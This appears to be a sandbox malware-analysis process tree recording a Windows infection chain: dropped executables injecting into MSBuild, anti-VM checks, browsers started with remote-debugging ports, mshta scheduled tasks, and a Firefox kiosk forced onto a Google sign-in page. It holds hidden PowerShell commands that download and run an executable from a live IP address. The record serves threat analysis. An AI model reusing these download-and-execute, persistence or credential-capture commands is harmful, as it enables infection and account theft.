C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4272,i,254303709348779789,10979758104582148339,262144 --variations-seed-version --mojo-platform-channel-handle=4228 /prefetch:216⤵
- Uses browser remote debugging
PID:18100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4168,i,254303709348779789,10979758104582148339,262144 --variations-seed-version --mojo-platform-channel-handle=4592 /prefetch:116⤵
- Uses browser remote debugging
PID:18276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5248,i,254303709348779789,10979758104582148339,262144 --variations-seed-version --mojo-platform-channel-handle=5276 /prefetch:816⤵PID:18644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5384,i,254303709348779789,10979758104582148339,262144 --variations-seed-version --mojo-platform-channel-handle=5292 /prefetch:816⤵PID:7436
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"15⤵
- Uses browser remote debugging
PID:15640 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch16⤵
- Uses browser remote debugging
PID:15648 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ff9864cf208,0x7ff9864cf214,0x7ff9864cf22017⤵PID:15668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1960,i,8321378785973777290,17986305301299211654,262144 --variations-seed-version --mojo-platform-channel-handle=2932 /prefetch:317⤵PID:16040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2192,i,8321378785973777290,17986305301299211654,262144 --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:217⤵PID:16060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2448,i,8321378785973777290,17986305301299211654,262144 --variations-seed-version --mojo-platform-channel-handle=3052 /prefetch:817⤵PID:16156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3484,i,8321378785973777290,17986305301299211654,262144 --variations-seed-version --mojo-platform-channel-handle=3524 /prefetch:117⤵
- Uses browser remote debugging
PID:16240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3500,i,8321378785973777290,17986305301299211654,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:117⤵
- Uses browser remote debugging
PID:16228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4696,i,8321378785973777290,17986305301299211654,262144 --variations-seed-version --mojo-platform-channel-handle=4684 /prefetch:817⤵PID:8244
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4940,i,8321378785973777290,17986305301299211654,262144 --variations-seed-version --mojo-platform-channel-handle=5048 /prefetch:817⤵PID:8708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5384,i,8321378785973777290,17986305301299211654,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:817⤵PID:4688
-
-
-
-
C:\ProgramData\mglxbsjwbs.exe"C:\ProgramData\mglxbsjwbs.exe"15⤵PID:18524
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"16⤵PID:18568
-
-
-
C:\ProgramData\8q1nycbaim.exe"C:\ProgramData\8q1nycbaim.exe"15⤵PID:15444
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"16⤵PID:15624
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""17⤵
- Uses browser remote debugging
PID:12484 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff985e1dcf8,0x7ff985e1dd04,0x7ff985e1dd1018⤵PID:12508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2748,i,6016353256084048051,1265232778019231106,262144 --variations-seed-version --mojo-platform-channel-handle=3608 /prefetch:218⤵PID:12796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2108,i,6016353256084048051,1265232778019231106,262144 --variations-seed-version --mojo-platform-channel-handle=3732 /prefetch:818⤵PID:5520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2760,i,6016353256084048051,1265232778019231106,262144 --variations-seed-version --mojo-platform-channel-handle=3764 /prefetch:118⤵
- Uses browser remote debugging
PID:6312
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2768,i,6016353256084048051,1265232778019231106,262144 --variations-seed-version --mojo-platform-channel-handle=3784 /prefetch:118⤵
- Uses browser remote debugging
PID:1992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3300,i,6016353256084048051,1265232778019231106,262144 --variations-seed-version --mojo-platform-channel-handle=3804 /prefetch:218⤵
- Uses browser remote debugging
PID:4084
-
-
-
-
-
C:\ProgramData\qieknozmoz.exe"C:\ProgramData\qieknozmoz.exe"15⤵PID:8072
-
C:\Users\Admin\AppData\Local\Temp\1WYX28h6\xNUqgMCMACLjG7Ts.exeC:\Users\Admin\AppData\Local\Temp\1WYX28h6\xNUqgMCMACLjG7Ts.exe 016⤵PID:6068
-
C:\Users\Admin\AppData\Local\Temp\1WYX28h6\gptkvPXm8Rw7vQWE.exeC:\Users\Admin\AppData\Local\Temp\1WYX28h6\gptkvPXm8Rw7vQWE.exe 606817⤵PID:11244
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\5xbai" & exit15⤵PID:9024
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1116⤵
- Delays execution with timeout.exe
PID:864
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\JKJKJJDBKE.exe"12⤵
- System Location Discovery: System Language Discovery
PID:15288 -
C:\Users\Admin\JKJKJJDBKE.exe"C:\Users\Admin\JKJKJJDBKE.exe"13⤵
- Executes dropped EXE
PID:7960 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"14⤵PID:7080
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\GDBFHDHJKK.exe"12⤵
- System Location Discovery: System Language Discovery
PID:6984 -
C:\Users\Admin\GDBFHDHJKK.exe"C:\Users\Admin\GDBFHDHJKK.exe"13⤵
- Executes dropped EXE
PID:20144 -
C:\Users\Admin\AppData\Local\Temp\RLXfftiu\Yw8eoD2DQkVL2niY.exeC:\Users\Admin\AppData\Local\Temp\RLXfftiu\Yw8eoD2DQkVL2niY.exe 014⤵
- Executes dropped EXE
PID:20160 -
C:\Users\Admin\AppData\Local\Temp\RLXfftiu\OsWdfcBuOS504XIe.exeC:\Users\Admin\AppData\Local\Temp\RLXfftiu\OsWdfcBuOS504XIe.exe 2016015⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:20376 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 20376 -s 62016⤵
- Program crash
PID:15088
-
-
-
C:\Users\Admin\AppData\Local\Temp\RLXfftiu\OrqQu1BHsbwbIbH9.exeC:\Users\Admin\AppData\Local\Temp\RLXfftiu\OrqQu1BHsbwbIbH9.exe 2016015⤵PID:18400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 18400 -s 63616⤵
- Program crash
PID:15336
-
-
-
C:\Users\Admin\AppData\Local\Temp\RLXfftiu\355Di4aL5lmU4aOo.exeC:\Users\Admin\AppData\Local\Temp\RLXfftiu\355Di4aL5lmU4aOo.exe 2016015⤵PID:18448
-
-
-
-
-
-
-
C:\ProgramData\7yc2nozmoz.exe"C:\ProgramData\7yc2nozmoz.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6640 -
C:\Users\Admin\AppData\Local\Temp\lQajfhr8\Vv4PwOXY3OMt59cD.exeC:\Users\Admin\AppData\Local\Temp\lQajfhr8\Vv4PwOXY3OMt59cD.exe 011⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:6692 -
C:\Users\Admin\AppData\Local\Temp\lQajfhr8\U6eP6xfYmpVYiDt2.exeC:\Users\Admin\AppData\Local\Temp\lQajfhr8\U6eP6xfYmpVYiDt2.exe 669212⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6908 -s 428013⤵
- Program crash
PID:20280
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6692 -s 120012⤵
- Program crash
PID:20252
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\xbaim" & exit10⤵
- System Location Discovery: System Language Discovery
PID:11168 -
C:\Windows\SysWOW64\timeout.exetimeout /t 1111⤵
- Delays execution with timeout.exe
PID:11216
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3936 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:4596
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:4604
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4956 -
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5184
-
-
-
C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1188 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5568
-
-
-
C:\Users\Admin\AppData\Local\Temp\10030290101\1ab6d4cae8.exe"C:\Users\Admin\AppData\Local\Temp\10030290101\1ab6d4cae8.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2080 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"9⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5012
-
-
-
C:\Users\Admin\AppData\Local\Temp\10030300101\b10ab05d2e.exe"C:\Users\Admin\AppData\Local\Temp\10030300101\b10ab05d2e.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1544 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"9⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:6508
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe"C:\Users\Admin\AppData\Local\Temp\10235300101\UD49QH6.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3120
-
-
C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe"C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3680 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit7⤵PID:4640
-
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2460
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235690101\00e7be516b.exe"C:\Users\Admin\AppData\Local\Temp\10235690101\00e7be516b.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn I50syma39e5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\y6iHD1xDF.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn I50syma39e5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\y6iHD1xDF.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:5720
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\y6iHD1xDF.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4432 -
C:\Users\Admin\AppData\Local\TempECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE"C:\Users\Admin\AppData\Local\TempECVIULFBFD1TCCUVTDOXMMIJZRBAKDIO.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1672
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10235700121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:2912 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:5432 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵PID:468
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5640
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "gOW20maOCy9" /tr "mshta \"C:\Temp\58kWgP4xy.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1888
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\58kWgP4xy.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4336
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235930101\3179f4144f.exe"C:\Users\Admin\AppData\Local\Temp\10235930101\3179f4144f.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3352
-
-
C:\Users\Admin\AppData\Local\Temp\10235940101\5c87f8d2b6.exe"C:\Users\Admin\AppData\Local\Temp\10235940101\5c87f8d2b6.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364 -
C:\Users\Admin\AppData\Local\Temp\310PDDDSLO38N3Z92I98IN4L8EKWN.exe"C:\Users\Admin\AppData\Local\Temp\310PDDDSLO38N3Z92I98IN4L8EKWN.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:408
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235950101\5b90e5b727.exe"C:\Users\Admin\AppData\Local\Temp\10235950101\5b90e5b727.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1828
-
-
C:\Users\Admin\AppData\Local\Temp\10235960101\1ab6d4cae8.exe"C:\Users\Admin\AppData\Local\Temp\10235960101\1ab6d4cae8.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6084 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3180
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4628
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4912
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4948
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:3236
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4540 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27099 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {8f8a0b27-9b79-48e6-a99e-f242ee8ae603} -parentPid 4540 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4540" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:5972
-
-
